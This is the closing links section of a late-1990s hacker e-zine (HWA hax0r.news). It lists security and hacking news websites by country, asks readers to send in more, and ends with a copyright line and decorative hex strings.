~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed

Belgium.......: http://securax.org/cum/ *New address*

Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net

Canada .......: http://www.hackcanada.com

Croatia.......: http://security.monitor.hr

Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net

Finland ........http://hackunlimited.com/

Germany ........http://www.alldas.de/
                http://www.security-news.com/

Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/

Netherlands...: http://security.pine.nl/

Russia........: http://www.tsu.ru/~eugene/

Singapore.....: http://www.icepoint.com

South Africa ...http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net

Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]